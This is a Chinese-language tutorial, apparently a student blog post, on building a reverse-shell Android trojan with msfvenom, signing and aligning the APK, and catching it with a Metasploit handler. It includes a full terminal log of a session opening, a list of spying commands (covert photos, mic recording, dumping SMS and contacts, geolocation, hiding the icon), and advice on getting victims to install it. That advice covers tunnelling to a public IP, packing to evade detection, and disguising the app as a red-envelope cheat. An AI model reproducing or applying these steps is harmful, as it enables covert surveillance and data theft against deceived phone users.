前置条件
需要有kali系统并且保证相关命令正常执行。
登录Oracle官网下载Linux版的jdk
事出有因,期末了各科都要交项目,安卓也不例外,我想着交什么呢?交安卓app感觉太过乏味,还是这个比较新颖,显得Big高。2020.1.3---建议还是不要学我,我项目零分
操作
1.打开终端,输入ifconfig查看ip地址(也是监听地址)
2.输入以下命令
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
3.为了木马的兼容性为其配置签名,并验证
创建证书:
keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999
注意:这里alias参数后跟apk文件夹的文件名,文件名参考第二部生成,可自行设置。
签名:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk
验证:
jarsigner -verify -verbose apk.apk
4.使用Zipalign优化apk
安装命令:
apt-get install zipalign
优化apk:
zipalign -v 4 apk.apk aaaa.apk
5.启动攻击加载模块,设置反弹连接
启动msf:
msfconsole
1.use exploit/multi/handler //加载模块
2. set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置
这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 172.23.0.209 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.exploit //开始执行漏洞 开始监听,等待手机上线
结果流程演示
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.210.26.27 netmask 255.255.248.0 broadcast 10.210.31.255
inet6 fe80::20c:29ff:fe4f:7237 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:4f:72:37 txqueuelen 1000 (Ethernet)
RX packets 16 bytes 2062 (2.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37 bytes 3277 (3.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.210.26.27 LPORT=5555 R > /root/apk.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10085 bytes
root@kali:~# keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999
输入密钥库口令:
再次输入新口令:
您的名字与姓氏是什么?
[Unknown]: 1
您的组织单位名称是什么?
[Unknown]: 1
您的组织名称是什么?
[Unknown]: 1
您所在的城市或区域名称是什么?
[Unknown]: 1
您所在的省/市/自治区名称是什么?
[Unknown]: 1
该单位的双字母国家/地区代码是什么?
[Unknown]: 1
CN=1, OU=1, O=1, L=1, ST=1, C=1是否正确?
[否]: y
正在为以下对象生成 1,024 位RSA密钥对和自签名证书 (SHA256withRSA) (有效期为 999 天):
CN=1, OU=1, O=1, L=1, ST=1, C=1
输入 <apk> 的密钥口令
(如果和密钥库口令相同, 按回车):
[正在存储apk-trojan-key.keystore]
Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore apk-trojan-key.keystore -destkeystore apk-trojan-key.keystore -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。
root@kali:~# jarsigner -verbose -sigalg SHA256withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk
输入密钥库的密码短语:
正在添加: META-INF/APK.SF
正在添加: META-INF/APK.RSA
正在签名: AndroidManifest.xml
正在签名: resources.arsc
正在签名: classes.dex
>>> 签名者
X.509, CN=1, OU=1, O=1, L=1, ST=1, C=1
[可信证书]
jar 已签名。
警告:
签名者证书为自签名证书。
root@kali:~# jarsigner -verify -verbose apk.apk
s 258 Sat Dec 28 10:47:08 EST 2019 META-INF/MANIFEST.MF
393 Sat Dec 28 10:49:06 EST 2019 META-INF/APK.SF
870 Sat Dec 28 10:49:06 EST 2019 META-INF/APK.RSA
272 Sat Dec 28 10:47:08 EST 2019 META-INF/SIGNFILE.SF
1842 Sat Dec 28 10:47:08 EST 2019 META-INF/SIGNFILE.RSA
0 Sat Dec 28 10:47:08 EST 2019 META-INF/
sm 6992 Sat Dec 28 10:47:08 EST 2019 AndroidManifest.xml
sm 572 Sat Dec 28 10:47:08 EST 2019 resources.arsc
sm 19932 Sat Dec 28 10:47:08 EST 2019 classes.dex
s = 已验证签名
m = 在清单中列出条目
k = 在密钥库中至少找到了一个证书
i = 在身份作用域内至少找到了一个证书
- 由 "CN=1, OU=1, O=1, L=1, ST=1, C=1" 签名
摘要算法: SHA1
签名算法: SHA256withRSA, 1024 位密钥
- 无法解析的与签名相关的文件 META-INF/SIGNFILE.SF
jar 已验证。
警告:
此 jar 包含其证书链无效的条目。原因: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
此 jar 包含其签名者证书为自签名证书的条目。
此 jar 包含的签名没有时间戳。如果没有时间戳, 则在其中任一签名者证书到期 (最早为 2022-09-22) 之后, 用户可能无法验证此 jar。
有关详细信息, 请使用 -verbose 和 -certs 选项重新运行。
签名者证书将于 2022-09-22 到期。
root@kali:~# zipalign -v 4 apk.apk aaaa.apk
Verifying alignment of aaaa.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
283 META-INF/APK.SF (OK - compressed)
626 META-INF/APK.RSA (OK - compressed)
1316 META-INF/ (OK)
1366 META-INF/SIGNFILE.SF (OK - compressed)
1648 META-INF/SIGNFILE.RSA (OK - compressed)
2733 AndroidManifest.xml (OK - compressed)
4500 resources.arsc (OK - compressed)
4730 classes.dex (OK - compressed)
Verification successful
root@kali:~# msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
[-] ***
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v5.0.41-dev ]
+ -- --=[ 1914 exploits - 1074 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.210.26.27
LHOST => 10.210.26.27
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.210.26.27:5555
[*] Sending stage (72435 bytes) to 10.210.26.14
[*] Meterpreter session 1 opened (10.210.26.27:5555 -> 10.210.26.14:53964) at 2019-12-28 10:55:04 -0500
meterpreter > sysinfo
Computer : localhost
OS : Android 8.1.0 - Linux 4.19.50-android-x86_64-geeb7e76e5df5 (x86_64)
Meterpreter : dalvik/android
meterpreter > 到此完成木马生成及植入
木马常用监听命令
webcam_list 列出网络摄像头
webcam_stream //开启摄像头
webcam_snap //隐秘拍照功能
record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒
webcam_chat 开始视频聊天
webcam_snap 从指定的摄像头获取快照
webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]
Android Commands
=================
activity_start 从URI字符串启动Android活动
check_root 检查设备是否有根
dump_calllog 获取调用日志
dump_contacts 获取联系人列表
dump_sms 获取短信
geolocate 利用地理定位获取当前LAT
wlan_geolocate 利用WLAN信息获取当前LAT
hide_app_icon 从发射器隐藏应用程序图标
interval_collect 管理区间收集能力
send_sms 从目标会话发送短消息
set_audio_mode
sqlite_query 从存储库查询SQLite数据库
wakelock 启用/禁用Wakelock
可以输入?查看更多命令
常见问题解决
jarsigner命令找不到
原因:没有安装Java jdk,命令基于Java jdk执行,解决需要给kali配置Java jdk环境。
jarsigner签名使用
推荐jdk安装文档
Zipalign无法下载
可能跟你当前的网络环境有关系,换数据试一下,如果行不通参考以下
kali源更新
参考其中的更新命令,更新源之后再尝试是否能下载成功插件。
木马生成后监视窗口无响应
显示Started reverse TCP handler on “IP:端口”
但是不管怎么点击手机上的app msf里都没反应呢?
答:
服务器这边没反应是没建立起连接。先ping一下查看电脑能否ping通手机,如果可以那可能是端口问题,telnet一下就知道了,有可能端口被防火墙屏蔽了,有可能是端口被其他服务占用了。当然也不排除手机的问题,比如一些安全软件之类的问题,最好在虚拟机内测试避免木马造成不可逆的破坏。
让安装的人都中招
1.内网穿透,让你的监控地址成为一个公网IP这样就能接收到广域网的传来信息。
2.木马涉及的敏感权限较多,需要加壳,最近在研究apk反编译等技术,希望能修改掉apk图标,名称等。
3.如何让别人心甘情愿的自己安装,不仅要看木马的伪装,也要看你如何去社工,其实社工的本质就是研究对方的心理,达到欺骗目的,比如你可以说,这是一个抢红包外挂,是不是对方极大程度的对软件的安全性放松警惕呢?
说明
文章内容仅供学习参考,不得用于非法测试,请遵守国家法律!